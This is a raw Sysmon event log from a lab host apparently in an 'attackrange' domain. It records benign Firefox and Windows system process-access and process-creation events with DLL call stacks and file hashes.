Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2ba9421|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000016970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+2ba9393|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+50312|C:\Program Files\Mozilla Firefox\firefox.exe+2d163|C:\Program Files\Mozilla Firefox\xul.dll+9cb21b|C:\Program Files\Mozilla Firefox\xul.dll+f7278c|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39bf2|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.469{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.28.1970743161\168315061" -childID 5 -isForBrowser -prefsHandle 4980 -prefMapHandle 4976 -prefsLen 11300 -prefMapSize 229288 -parentBuildID 20210105180113 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 "\\.\pipe\gecko-crash-server-pipe.7052" 4700 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000016960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|UNKNOWN(000000238BE25BFC) 10341000x800000000000000016957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.448{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla 